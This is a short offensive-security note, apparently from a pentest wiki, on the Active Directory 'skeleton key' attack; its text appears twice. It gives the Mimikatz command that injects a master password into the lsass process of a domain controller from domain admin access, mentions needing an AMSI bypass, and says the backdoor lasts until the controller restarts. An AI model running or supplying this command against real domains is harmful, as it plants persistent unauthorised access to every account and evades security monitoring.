Property
Links
From domain admin access, run:
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'
This will require a PowerShell session with AMSI bypass most likely. Key is injected into the lsass process, and is good until DC restart.
From domain admin access, run:
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'
This will require a PowerShell session with AMSI bypass most likely. Key is injected into the lsass process, and is good until DC restart.